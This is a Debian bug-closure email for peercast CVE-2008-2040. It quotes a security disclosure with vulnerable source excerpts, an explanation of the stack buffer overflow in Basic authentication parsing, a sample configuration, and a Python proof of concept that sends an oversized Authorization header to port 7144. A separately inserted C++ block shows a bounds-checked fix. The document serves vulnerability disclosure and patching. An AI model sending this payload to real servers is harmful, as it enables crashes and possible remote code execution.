Your message dated Sat, 26 Jul 2008 09:57:49 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#478573: fixed in peercast 0.1217.toots.20060314-1etch1
has caused the Debian Bug report #478573,
regarding [peercast] CVE-2008-2040 stack-based buffer overflow in HTTP::getAuthUserPass function
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)

--
478573: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=478573
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: peercast
Severity: grave
Tags: security
X-Debbugs-CC: [EMAIL PROTECTED]

I found a security issue in the peercast server in the HTTP::getAuthUserPass
function. I already contacted the upstream author 6 days ago and didn't get an
answer yet, so I am publishing this now.

From core/common/http.cpp:

    105 void HTTP::getAuthUserPass(char *user, char *pass)
    106 {
    107     if (arg)
    108     {
    109         char *s = stristr(arg,"Basic");
    110         if (s)
    111         {
    112             while (*s)
    113                 if (*s++ == ' ')
    114                     break;
    115             String str;
    116             str.set(s,String::T_BASE64);
    117             str.convertTo(String::T_ASCII);
    118             s = strstr(str.cstr(),":");
    119             if (s)
    120             {
    121                 *s = 0;
    122                 if (user)
    123                     strcpy(user,str.cstr());
    124                 if (pass)
    125                     strcpy(pass,s+1);

This function is used if authentication to the peercast server is done by
basic HTTP auth rather than by a cookie. In line 116 the base64 encoded string
is copied into str. Note the set method is peercast's own implementation of
set, since it reimplements the String class. set looks like this:

From core/common/sys.h:

     38     MAX_LEN = 256
    ...
     62     void set(const char *p, TYPE t=T_ASCII)
     63     {
     64         strncpy(data,p,MAX_LEN-1);
     65         data[MAX_LEN-1] = 0;
     66         type = t;
     67     }

In line 117 the string gets decoded, and in line 118 and following the part
before ':' in the decoded string gets copied into user and the part after it
into pass.

From core/common/servhs.cpp:

    558 bool Servent::handshakeAuth(HTTP &http,const char *args,bool local)
    559 {
    560     char user[64],pass[64];
    561     user[0] = pass[0] = 0;
    ...
    580     while (http.nextHeader())
    581     {
    582         char *arg = http.getArgStr();
    583         if (!arg)
    584             continue;
    585
    586         switch (servMgr->authType)
    587         {
    588             case ServMgr::AUTH_HTTPBASIC:
    589                 if (http.isHeader("Authorization"))
    590                     http.getAuthUserPass(user,pass);
    591                 break;

user and pass are only declared to have 64 bytes (line 558) while the buffer
used for copy can store up to MAX_LEN (256) bytes (ok minus the : here).
Servent::handshakeAuth then calls the getAuthUserPass function, triggering a
buffer overflow. It's thus possible to crash the server and execute arbitrary
code if the server allows http-basic authentication.

I already requested a CVE id for this.
An example configuration and PoC is attached.

Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

Attached example configuration:

    [Server]
    serverPort = 7144
    autoServe = Yes
    forceIP =
    isRoot = No
    maxBitrateOut = 0
    maxRelays = 2
    maxDirect = 0
    maxRelaysPerChannel = 0
    firewallTimeout = 30
    forceNormal = No
    rootMsg =
    authType = http-basic
    cookiesExpire = session
    htmlPath = html/en
    minPGNUIncoming = 10
    maxPGNUIncoming = 20
    maxServIn = 50
    chanLog =
    networkID = 00000000000000000000000000000000

    [Broadcast]
    broadcastMsgInterval = 10
    broadcastMsg =
    icyMetaInterval = 8192
    broadcastID = 008145B5C0427118B595AF7D9E110000
    hostUpdateInterval = 180
    maxControlConnections = 3
    rootHost = yp.peercast.org

    [Client]
    refreshHTML = 5
    relayBroadcast = 30
    minBroadcastTTL = 1
    maxBroadcastTTL = 7
    pushTries = 5
    pushTimeout = 60
    maxPushHops = 8
    autoQuery = 0
    queryTTL = 7

    [Privacy]
    password = s0mep4ss
    maxUptime = 0

    [Filter]
    ip = 255.255.255.255
    private = Yes
    ban = No
    network = Yes
    direct = Yes
    [End]

    [Notify]
    PeerCast = Yes
    Broadcasters = Yes
    TrackInfo = Yes
    [End]

    [Server1]
    allowHTML = Yes
    allowBroadcast = Yes
    allowNetwork = Yes
    allowDirect = Yes
    [End]

    [Server2]
    allowHTML = No
    allowBroadcast = Yes
    allowNetwork = No
    allowDirect = No
    [End]

    [Debug]
    logDebug = No
    logErrors = No
    logNetwork = No
    logChannel = No
    pauseLog = No
    idleSleepTime = 10

Attached PoC:

    #!/usr/bin/env python
    import sys, socket

    port = 7144
    buff = 'GET /http/ HTTP/1.1\n'
    buff+= 'Connection: close\n'
    buff+= 'Accept: */*\n'
    buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'

    if(len(sys.argv) < 2):
        print "ERR: please specify a hostname"
        sys.exit(-1)

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], port))
        s.send(buff)
    except:
        print "ERR: socket()"
        sys.exit(-1)
--- End Message ---
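A bounded variant of the parsing flow described in the report above, as an added example that is neither peercast's code nor the Debian fix: the decoded credential is length-checked against the caller's buffer sizes before being copied, so an oversized Authorization header is rejected instead of overflowing the 64-byte stack arrays. The names getAuthUserPassSafe, b64decode and demoOversizedRejected are assumptions, and the sample header is constructed for the example.

```cpp
#include <cstddef>
#include <cstring>
#include <string>

// Minimal base64 decoder for this example only (not peercast's String class).
static std::string b64decode(const std::string &in) {
    static const std::string tbl =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    std::string out;
    unsigned val = 0; int bits = -8;
    for (char c : in) {
        if (c == '=') break;                        // padding ends the data
        std::string::size_type pos = tbl.find(c);
        if (pos == std::string::npos) continue;     // skip CR/LF and other junk
        val = (val << 6) | static_cast<unsigned>(pos);
        bits += 6;
        if (bits >= 0) { out.push_back(static_cast<char>((val >> bits) & 0xFF)); bits -= 8; }
    }
    return out;
}
// Bounded replacement for the flow in getAuthUserPass: "Basic <b64>" is decoded
// and split at ':', but each half is copied only if it fits, NUL included, in the
// caller-supplied buffer; otherwise the request is rejected. (The original
// strcpy'd up to 255 decoded bytes into 64-byte stack arrays.) Hypothetical name.
bool getAuthUserPassSafe(const char *arg, char *user, size_t userLen,
                         char *pass, size_t passLen) {
    if (!arg || !user || !pass) return false;
    const char *s = strstr(arg, "Basic");           // peercast used case-insensitive stristr
    if (!s) return false;
    s += 5;
    while (*s == ' ') ++s;
    std::string decoded = b64decode(s);
    std::string::size_type colon = decoded.find(':');
    if (colon == std::string::npos) return false;
    std::string u = decoded.substr(0, colon), p = decoded.substr(colon + 1);
    if (u.size() >= userLen || p.size() >= passLen) return false;   // would overflow
    memcpy(user, u.c_str(), u.size() + 1);
    memcpy(pass, p.c_str(), p.size() + 1);
    return true;
}

// Constructed sample: "user:p" plus 90 more 'o' bytes, a 91-byte password that
// the report's char pass[64] cannot hold. Returns true if it is rejected.
bool demoOversizedRejected() {
    std::string hdr = "Basic dXNlcjpw";             // base64("user:p")
    for (int i = 0; i < 30; ++i) hdr += "b29v";      // base64("ooo"), 30 times
    char user[64], pass[64];
    return !getAuthUserPassSafe(hdr.c_str(), user, sizeof user, pass, sizeof pass);
}
```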
--- Begin Message ---
Source: peercast
Source-Version: 0.1217.toots.20060314-1etch1

We believe that the bug you reported is fixed in the latest version of
peercast, which is due to be installed in the Debian FTP archive:

libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb
libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb
peercast-handlers_0.1217.toots.20060314-1etch1_all.deb
  to pool/main/p/peercast/peercast-handlers_0.1217.toots.20060314-1etch1_all.deb
peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb
peercast_0.1217.toots.20060314-1etch1.diff.gz
  to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1.diff.gz
peercast_0.1217.toots.20060314-1etch1.dsc
  to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1.dsc
peercast_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1_amd64.deb

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Romain Beauxis <[EMAIL PROTECTED]> (supplier of updated peercast package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])

Format: 1.7
Date: Sun, 18 May 2008 03:28:44 +0200
Source: peercast
Binary: libpeercast0 peercast-handlers peercast-servent peercast libpeercast0-dev
Architecture: source amd64 all
Version: 0.1217.toots.20060314-1etch1
Distribution: stable-security
Urgency: low
Maintainer: Romain Beauxis <[EMAIL PROTECTED]>
Changed-By: Romain Beauxis <[EMAIL PROTECTED]>
Description:
 libpeercast0 - P2P audio and video streaming server libraries
 libpeercast0-dev - P2P audio and video streaming server -- development
 peercast   - P2P audio and video streaming server metapackage
 peercast-handlers - P2P audio and video streaming handlers
 peercast-servent - P2P audio and video streaming servent
Closes: 478573
Changes:
 peercast (0.1217.toots.20060314-1etch1) stable-security; urgency=low
 .
   * Fixed CVE-2008-2040:
     | stack-based buffer overflow in the
     | HTTP::getAuthUserPass function leading
     | to remote DoS or arbitrary code execution
     | if peercast is configured to use http-basic
     | authentication
     Closes: #478573
     Thanks to Nico Golde <[EMAIL PROTECTED]> for reporting and fixing the issue.
--- End Message ---